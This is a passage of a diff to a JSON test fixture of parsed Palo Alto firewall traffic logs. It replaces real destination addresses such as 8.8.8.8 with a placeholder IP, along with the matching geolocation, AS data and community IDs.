States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15217,7 +15346,7 @@ "destination": { "nat": { "port": 443, - "ip": "34.238.96.22" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -15239,7 +15368,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:6LTK93w8ZdfxzSfZXzebKR6jWxo=" + "community_id": "1:DR/FJWxl0KE8kCtqxx39GAbhfOU=" } }, "sequence_number": 32091203, @@ -15259,8 +15388,8 @@ ], "network": { "community_id": [ - "1:FdupsUbF1ju1djczW9JAKlxKNC4=", - "1:6LTK93w8ZdfxzSfZXzebKR6jWxo=" + "1:NUMnfp0g3oB9+utGD+r0aXUodRo=", + "1:DR/FJWxl0KE8kCtqxx39GAbhfOU=" ], "transport": "tcp", "application": "incomplete", @@ -15300,14 +15429,14 @@ ], "ip": [ "192.168.15.224", - "34.238.96.22", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 12000000000, - "ingested": "2021-09-08T12:40:05.942186564Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,34.238.96.22,192.168.1.63,34.238.96.22,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031915300Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -15330,30 +15459,29 @@ "destination": { "nat": { "port": 443, - "ip": "130.211.47.17" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Mountain View", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -122.0748, - "lat": 37.4043 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 280, - "ip": "130.211.47.17", + "ip": "175.16.199.1", "packets": 4 }, "rule": { @@ -15372,7 +15500,7 @@ "packets": 4, "ip": "192.168.15.224" }, - "message": "192.168.15.224,130.211.47.17,192.168.1.63,130.211.47.17,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15387,7 +15515,7 @@ "destination": { "nat": { "port": 443, - "ip": "130.211.47.17" + "ip": "175.16.199.1" } }, "endreason": "tcp-fin", @@ -15409,7 +15537,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:roV5JFl0FdQHIRUkgeZm+ZeyeCQ=" + "community_id": "1:SyljGYOMfFYBpelQe35LIJQjELY=" } }, "sequence_number": 32091204, @@ -15429,8 +15557,8 @@ ], "network": { "community_id": [ - "1:fHitWYVd9RNFs7M5hQrqw/dmY8Y=", - "1:roV5JFl0FdQHIRUkgeZm+ZeyeCQ=" + "1:hyEMTIsKIIcttx8mBWINE2IMQYw=", + "1:SyljGYOMfFYBpelQe35LIJQjELY=" ], "transport": "tcp", "application": "incomplete", @@ -15470,14 +15598,14 @@ ], "ip": [ "192.168.15.224", - "130.211.47.17", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 12000000000, - "ingested": "2021-09-08T12:40:05.942190040Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,130.211.47.17,192.168.1.63,130.211.47.17,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031920700Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -15500,27 +15628,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 172, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -15539,7 +15669,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15554,7 +15684,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -15576,7 +15706,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:5G+JVi/ClM/MfHhUL//vH/GmuaA=" + "community_id": "1:iFOe1PdUY9r8dwKaxQH+8rrvnAI=" } }, "sequence_number": 32091205, @@ -15596,8 +15726,8 @@ ], "network": { "community_id": [ - "1:n/IZF37E/7cErtK4po3ewuEQScY=", - "1:5G+JVi/ClM/MfHhUL//vH/GmuaA=" + "1:zJk1JtAystoTBaVlRntBCcIln4Q=", + "1:iFOe1PdUY9r8dwKaxQH+8rrvnAI=" ], "transport": "udp", "application": "dns", @@ -15637,14 +15767,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942193529Z", - "original": "Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031926100Z", + "original": "Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:51.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -15667,27 +15797,29 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 588, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 6 }, "rule": { @@ -15706,7 +15838,7 @@ "packets": 6, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15721,7 +15853,7 @@ "destination": { "nat": { "port": 0, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -15795,14 +15927,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942197050Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031931400Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -15825,27 +15957,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 94, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -15864,7 +15998,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -15879,7 +16013,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -15901,7 +16035,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:mdksC4jGw6MN7g3nGdquiqQ95vU=" + "community_id": "1:80NRQY9qT1RcwPXjJAnXbR/Cnx8=" } }, "sequence_number": 32091207, @@ -15921,8 +16055,8 @@ ], "network": { "community_id": [ - "1:jKueIOIhkRRjHQyRO93QyuKEiP8=", - "1:mdksC4jGw6MN7g3nGdquiqQ95vU=" + "1:+EKGNDzaa2Gmys4Gdwo/EIwHp2s=", + "1:80NRQY9qT1RcwPXjJAnXbR/Cnx8=" ], "transport": "udp", "application": "dns", @@ -15962,14 +16096,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942200586Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031936800Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -15992,27 +16126,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 170, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -16031,7 +16167,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -16046,7 +16182,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -16068,7 +16204,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:+zC2Y+UE7UqApr01oqb755Xyuf4=" + "community_id": "1:tMlsHUEsYDQ3Vv3JAJSu15cqkNE=" } }, "sequence_number": 32091208, @@ -16088,8 +16224,8 @@ ], "network": { "community_id": [ - "1:mci4o+GZJDLvZr11UdJH9bepPqU=", - "1:+zC2Y+UE7UqApr01oqb755Xyuf4=" + "1:4RiaH+n0JwxG6zcL26BuXxb9VkY=", + "1:tMlsHUEsYDQ3Vv3JAJSu15cqkNE=" ], "transport": "udp", "application": "dns", @@ -16129,14 +16265,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942204098Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031942300Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -16159,27 +16295,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 94, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -16198,7 +16336,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -16213,7 +16351,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -16235,7 +16373,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:xawqUBgLyfe1E61ObEXv4nbO590=" + "community_id": "1:NmuHySRLQ/6iGfMvm+qs/a2Nrpc=" } }, "sequence_number": 32091209, @@ -16255,8 +16393,8 @@ ], "network": { "community_id": [ - "1:Px8uRfOgVDuaWj/VKxjTwyAzHAM=", - "1:xawqUBgLyfe1E61ObEXv4nbO590=" + "1:IyD4gx5qjpc1VEbcmilQaH5vo9E=", + "1:NmuHySRLQ/6iGfMvm+qs/a2Nrpc=" ], "transport": "udp", "application": "dns", @@ -16296,14 +16434,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942207620Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031947700Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:52.000-05:00", "timezone": "America/New_York", "kind": "event", @@ -16326,27 +16464,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 94, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -16365,7 +16505,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -16380,7 +16520,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -16402,7 +16542,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:PDWWOeDVqKGZ/hwjVVdCDdF6qB4=" + "community_id": "1:lzFOPce/GJbHM86icsI0NMzcEUg=" } }, "sequence_number": 32091210, @@ -16422,8 +16562,8 @@ ], "network": { "community_id": [ - "1:6tSek5GUc9k56LSY4NgTMd0igd8=", - "1:PDWWOeDVqKGZ/hwjVVdCDdF6qB4=" + "1:CdL6dWgT+IMFe6ptUk1vLlpVL20=", + "1:lzFOPce/GJbHM86icsI0NMzcEUg=" ], "transport": "udp", "application": "dns", @@ -16463,14 +16603,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942211047Z", - "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031953Z", + "original": "Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United 